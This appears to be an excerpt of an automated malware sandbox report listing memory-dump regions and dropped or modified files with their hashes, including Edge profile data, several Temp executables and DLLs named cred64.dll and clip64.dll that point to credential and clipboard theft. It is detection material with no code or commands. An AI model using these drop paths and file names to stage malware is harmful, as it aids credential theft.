SHA256 28b7a1e7b492fff3e5268a6cd480721f211ceb6f2f999f3698b3b8cbd304bb22
SHA512 b99520bbca4d2b39f8bedb59944ad97714a3c9b8a87393719f1cbc40ed63c5834979f49346d31072c4d354c612ab4db9bf7f16e7c15d6802c9ea507d8c46af75

memory/5244-339-0x0000000074890000-0x0000000075040000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 285252a2f6327d41eab203dc2f402c67
SHA1 acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6
SHA256 5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026
SHA512 11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

memory/5244-343-0x0000000006FA0000-0x0000000006FB0000-memory.dmp

memory/5340-347-0x00000000004A0000-0x00000000004AA000-memory.dmp

memory/5340-348-0x0000000074890000-0x0000000075040000-memory.dmp

memory/5376-351-0x0000000000400000-0x0000000000434000-memory.dmp

memory/5376-350-0x0000000000400000-0x0000000000434000-memory.dmp

memory/5376-354-0x0000000000400000-0x0000000000434000-memory.dmp

memory/5564-369-0x0000000000200000-0x000000000023E000-memory.dmp

memory/5564-371-0x0000000074890000-0x0000000075040000-memory.dmp

memory/5564-372-0x00000000071F0000-0x0000000007200000-memory.dmp

memory/5244-380-0x0000000074890000-0x0000000075040000-memory.dmp

memory/5736-381-0x0000000000400000-0x000000000047E000-memory.dmp

memory/5736-391-0x00000000006F0000-0x000000000074A000-memory.dmp

memory/5736-397-0x0000000074890000-0x0000000075040000-memory.dmp

memory/5340-398-0x0000000074890000-0x0000000075040000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 92ae4c82aa2d40b5ce662b0684eaec5e
SHA1 1dd0608c3a2f87b6fb5eafb7ce52707a12d91445
SHA256 8ae2a81c2cfa4d825876b040194d1a549a5f8bb6840b5109ec3a2ddffed6a87b
SHA512 001860540165ae0e473bbb0c534fb6c07afeda4733eebce7d269079058306eeccbe77156bf8842c3d612655e9ca64bc7d7c81b00c34abd0759303ed81ebbb1a1

memory/5564-408-0x0000000074890000-0x0000000075040000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 ada96af5b3c5d35dbd74733023057505
SHA1 773b0d2e93b28daf469cd104d517450137caed34
SHA256 f2671700177bac09b4eec2c8287ee1b71f67b21d8286fec302e7f55b3731f585
SHA512 c28d7b702b6a089f90bd84b50fde3de299d0c5ec843d6e06da9f7ee1ddfbcf04f6d05b5cb21bd098196417cd96b379e26e7506c412952c43d827118c6f99bfec

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe58b61c.TMP

MD5 bcc3fa35cec30b290c9ba7a62e4c63fc
SHA1 23248121c97214f9dabc8e977ce084b881c4a338
SHA256 40e0134cc3904fc279473939721513dbf4d0921cf7484d8226ce7cc81ec98473
SHA512 7d469d3c02f1b66d436a9ff24b64c803be0e9ba7ab34261460373aa541b650972ed72959c47a0ffd86fa403b08fbf3e8001f03d23e23ccfac46622fe271351e5

memory/5564-425-0x00000000071F0000-0x0000000007200000-memory.dmp

memory/5736-426-0x0000000008110000-0x0000000008176000-memory.dmp

memory/5340-436-0x0000000074890000-0x0000000075040000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

memory/5736-453-0x0000000008A20000-0x0000000008A70000-memory.dmp

memory/5736-454-0x0000000008A80000-0x0000000008AF6000-memory.dmp

memory/5736-455-0x0000000008DD0000-0x0000000008F92000-memory.dmp

memory/5736-456-0x0000000008FA0000-0x00000000094CC000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 bf4e15927d748e7fea6b6f7d68958d72
SHA1 d8e89f83c0ed5c98f731f57b8d9e107ef52747a4
SHA256 a0defc69f3c318c2ad427239899ec26b00d6a6fd7035208313950242f906a387
SHA512 b440dcda4aaf22b95382e2e518461a4314cc27ca4ef82551574d2d9d0deac4d46383108d5c52cba7f0673074ed6a43fd0ea85e6d242c92707a1b035cab5eede5

memory/5736-466-0x0000000009550000-0x000000000956E000-memory.dmp

memory/5736-468-0x0000000000400000-0x000000000047E000-memory.dmp

memory/5736-469-0x0000000074890000-0x0000000075040000-memory.dmp

memory/5736-472-0x0000000074890000-0x0000000075040000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 8f4b3f474908a90425ac90dba527234d
SHA1 1599f8bccb157e97c8e683cdec065cddabcf2e39
SHA256 a13736908409cf629f99b7b154906a2a222cd66513b9f91d2824da244da6af60
SHA512 dcd558063d6c76b350a4411c2acc17802d6e2bc482b6f80d59c2c0a45ced96688fbebd7c124e6e9982d9516ac7bd415e7e413c1e6c6f5baf17ca0659df8311b2

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll

MD5 a5b509a3fb95cc3c8d89cd39fc2a30fb
SHA1 5aff4266a9c0f2af440f28aa865cebc5ddb9cd5c
SHA256 5f3c80056c7b1104c15d6fee49dac07e665c6ffd0795ad486803641ed619c529
SHA512 3cc58d989c461a04f29acbfe03ed05f970b3b3e97e6819962fc5c853f55bce7f7aba0544a712e3a45ee52ab31943c898f6b3684d755b590e3e961ae5ecd1edb9

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll

MD5 e913b0d252d36f7c9b71268df4f634fb
SHA1 5ac70d8793712bcd8ede477071146bbb42d3f018
SHA256 4cf5b584cf79ac523f645807a65bc153fbeaa564c0e1acb4dac9004fc9d038da
SHA512 3ea08f0897c1b7b5859961351eef59840bbf319a6ad7ebe1c9e1b5e2ce25588d7b1a37fd6c5417653521fc73f1f42eb043d0ee6fcd645aa92b8f305d726273b4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 c7e6c262c80af683f6582e99d116ae93
SHA1 f8e1ae648c03cb6f56974df87ce465242b4b61b4
SHA256 a7b2293f8e4d3a7912309ff6c69b98d328ef03f534722a3bbddaa78e32237495
SHA512 69847abbccc41bf4fe547b08027c277dea285f3716ee8c263c104e94a54626d78d62007a21314e893b0b9dd50c93102e3f9c76d26ab140753d59c48014d9818e

memory/5876-600-0x0000000074890000-0x0000000075040000-memory.dmp

memory/5876-603-0x00000000003C0000-0x00000000014F8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 6a085a5ce478080d06a5035eaee7d97c
SHA1 75e774ca09a447b2836a14c9fe5e4d88a4ac37cb
SHA256 4d8d88228d68177f05233f9355fa8b25cee3a9bbcc96b47eeb9f12ec5c828457
SHA512 308d05358754432778f38a00097f2f2b0c085a9eabfe9621d36d46c41b76d54a5c3d54b0c3f194b1ce970d74c8138cad6d7ee57236a5e9ba1b055bbce670b366

memory/6096-611-0x0000000000400000-0x000000000047E000-memory.dmp

memory/6096-613-0x0000000000590000-0x00000000005EA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 498af485852079b7064dd1675377809f
SHA1 a6a36a996b5f1d2dab2eb4232f65275cb1df4030
SHA256 e56a79a9de6b1e161d5cb6969bd056062565f2525800b38f205bd41eb45bd0f6
SHA512 04c5e5cebf49162b6947172d1409ba8e419e39260aed3832b39e1846b9fd2dcb06590983f2b067f5601b8006bf79d7973df47d2776de5f33621ddc945f98e344

memory/6096-623-0x0000000074890000-0x0000000075040000-memory.dmp

memory/324-624-0x0000000000580000-0x0000000000589000-memory.dmp

memory/324-626-0x0000000000760000-0x0000000000860000-memory.dmp

memory/6096-627-0x0000000007700000-0x0000000007710000-memory.dmp

memory/2664-632-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2664-638-0x0000000000400000-0x0000000000409000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\setup.exe

MD5 cac360e5fb18e8f135b7008cb478e15a
SHA1 37e4f9b25237b12ab283fc70bf89242ab3b83875
SHA256 e8689f69dd3d0a3bd5f6e4b3a85251583c4b3b1dbf03e0c30c6cf0048e6532f8
SHA512 7f0bd6103dd802de4a4665b460c8c178f32e6075094532ec43c83fc1d8595d9495772bf191669f4b72cc2d78f91b06e046a11bbd0ef935b040eeb31e741d2a32

memory/1208-646-0x0000000074890000-0x0000000075040000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\kos4.exe

MD5 01707599b37b1216e43e84ae1f0d8c03
SHA1 521fe10ac55a1f89eba7b8e82e49407b02b0dcb2
SHA256 cc0dbc1d31ccd9488695b690bd7e7aa4a90ba4b2a5d23ef48b296465f5aa44dd
SHA512 9f9ff29a12d26a7d42656e0faf970c908f1ef428b14e5a5fe7acd06371b96b16eb984e8fbee4e2b906c6db7fb39c9d4a221e79fc3d5e9ca9b59e377875bc5642

memory/1208-643-0x0000000000770000-0x0000000000B50000-memory.dmp

memory/1208-656-0x00000000053C0000-0x000000000545C000-memory.dmp

memory/5208-659-0x0000000002990000-0x0000000002D8F000-memory.dmp

memory/1956-660-0x00000000008B0000-0x00000000008B8000-memory.dmp

memory/5876-661-0x0000000074890000-0x0000000075040000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 2b53473498240b0cfe086cbf35137028
SHA1 20ed16a35649f642c7ab159efd26eadb1238e8c5
SHA256 ed20a7a5c56ce31712dac823763df62ba30eb3e4f9976f0bd5ed1c8638fac5ae
SHA512 3c7009d1677cef8fadce076a38638a919a0815bb04bdcf3480ee2916a30630606cff3d549a586d5f10b651af9f15303e858255c2479cd6fa725406decd14ea06

C:\Users\Admin\AppData\Local\Temp\latestX.exe

MD5 bae29e49e8190bfbbf0d77ffab8de59d
SHA1 4a6352bb47c7e1666a60c76f9b17ca4707872bd9
SHA256 f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87
SHA512 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2

memory/1956-681-0x00007FFBF8E20000-0x00007FFBF98E1000-memory.dmp

memory/5208-682-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/1956-684-0x000000001B630000-0x000000001B640000-memory.dmp

memory/5876-683-0x0000000074890000-0x0000000075040000-memory.dmp

memory/5208-685-0x0000000002E90000-0x000000000377B000-memory.dmp

memory/6096-688-0x0000000000400000-0x000000000047E000-memory.dmp

memory/3280-690-0x00000000088E0000-0x00000000088F6000-memory.dmp

memory/2664-691-0x0000000000400000-0x0000000000409000-memory.dmp

memory/6096-689-0x0000000074890000-0x0000000075040000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

MD5 11c7e3f85e6511a2310a99d13e4ed50d
SHA1 cf0e5d1a3d6589dd1c5a6e947e669007c8584e7f
SHA256 1854806620227e682b93a98d43c9c93fd4b27a0b960ab1f6264db20dad7e4596
SHA512 d8281c561404b83b7cfcdee368945b616c67038c51f2f92e9cde613b0b6c4fff1d8b5a52ef933a6bad8d479e16c4e52d01c344e96f7834e3bb389eea7982df54

memory/6132-704-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1956-708-0x00007FFBF8E20000-0x00007FFBF98E1000-memory.dmp

memory/3544-722-0x0000000000550000-0x0000000000551000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 e938acc2835f78cd2417a22cfd06e68c
SHA1 aa295374a760fdcded8cc53890a39ad6792af481
SHA256 cf0112ca764a8ada95c5102f6503ccf1201eda64432c071d58779481232d69c0
SHA512 2b7a5a107f62c612bfea103f65d280312dc9faf123f4347dddd0595f82ec5bf6285b607fc06f1485fb5817d61d8f27b45683c6cfc0c0c35058ddbeb14eff3fb6

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 2dc682d8155d4ccf2e1295cb949b1500
SHA1 2546c26d5eb58ba417eb176f393a0650a6eb2497
SHA256 30f93c5f41b5daac97e331168393dd5425342194ddd91407ad32b13e1a518e96
SHA512 310eb2c9a3a22a219435a827db34bce16bf1b630a7e6905aeaa7c98f95efc21c17711cedea1551bb9b0903b772bd75b0ade2c7ae936ecdda15519dc01e0959a0

memory/5208-775-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/1208-793-0x0000000074890000-0x0000000075040000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 fc30082742082568e5f7a239da3ef700
SHA1 588beec4965df7f052848c771cdcab8e2d3efcbc
SHA256 51954511ec4a81aba306073b862b0672eced0121dba58e35ccdc2cc598623179
SHA512 6a041ddb7a9006756ff3b815be8c4e19aaf8f4d6b1dfdb84c408a98ebf877a642c92b13541fb69b0df66fe75e61c55facd9416896e545ce84af1813f047bc830

memory/5188-804-0x0000000000400000-0x0000000000636000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 316ef47999dfa60764bcae41544412fa
SHA1 e159428b8c6b7f1781a6c7f958cac95c871310c2
SHA256 c2868ad99312bbbe84dafdff8dcd2a57202ab7ec9b92d9842155bb3ee47b2b08
SHA512 2417fd4745044ceceaf4f27098b13d0e77ea3be320bbb90743157ad77386e6ad1edd53e01217debd9a5fe0700dbe087964f97711120a9b812728a266688c8d35

memory/5188-813-0x0000000000400000-0x0000000000636000-memory.dmp

memory/5744-827-0x0000000000400000-0x000000000041B000-memory.dmp

memory/5744-833-0x0000000000400000-0x000000000041B000-memory.dmp

memory/5744-835-0x0000000000400000-0x000000000041B000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 390b91d90ac55b5f252fda9e5f21516e
SHA1 dff7c4475c7353ea05947f72c66eacc449bdb43f
SHA256 e8bb5eda2a113442957fa24b9541ae1824b13a335395abd94bdeb5d7d8620bd0
SHA512 3fac00c46e58da309838f785232bb0c6fc104e127741579b0b2c877a31cd23310e8256523fd79b9288ee82b91f0197c1b4db109633662ae2b75d86e6f899163b

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_r1cmnfcv.s03.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/5476-862-0x0000000010000000-0x000000001057B000-memory.dmp

memory/5208-866-0x0000000000400000-0x0000000000D1B000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 328ee31b165595662abc64b159d27b28
SHA1 1940a93a49af027f63e4d27f214ed87f6dc6ccfe
SHA256 c3f1d1bbb88c86a8dd125c96fdf2898d915c1db4e6bb7a29b786609ebb857dd9
SHA512 8553208cad50a9bede2498cd7919be5401dcb5444301a706f518f6d6874c6fdea5a4c9ad7c6e920cacd83b347ae5f57f61b25773f14d55b03127147a41d4c565

memory/5208-954-0x0000000000400000-0x0000000000D1B000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 8c1c6f6e444448ec2e9b94b685efc009
SHA1 d217cc31841cffe3a23577f3f9e8a6f4f160fdfa
SHA256 1567dbceccdcedf09437b6c7add49c8d8bec8d0714336c81749314864893b31c
SHA512 f7e4f6ec2d9b8d606b36eb66065dfc0233bc1627c932d394e879b9e823008f62e29b72e8009d246360928b073947c4ceebd2dc4a892186214873434fd9072d38

memory/4936-987-0x00007FF709D60000-0x00007FF70A301000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 f9ab57047007b5a737d910688d40cefa
SHA1 70e42aeb82d0796a874ec49a6e2fec9fcdf6fe90
SHA256 90fc4ebb2132b0501a2e9b762ceeca86824dcf2ef0daa64527ea90ac0d498231
SHA512 b7afbaa031edd3fd060e04beb22041ba17f3aa9debbe947685eeba95fa7122f8dfcf39b150188419f6eb7c028313aaa78e19a04710d2eeeeb7ddb08b5688eca4

memory/5208-1033-0x0000000000400000-0x0000000000D1B000-memory.dmp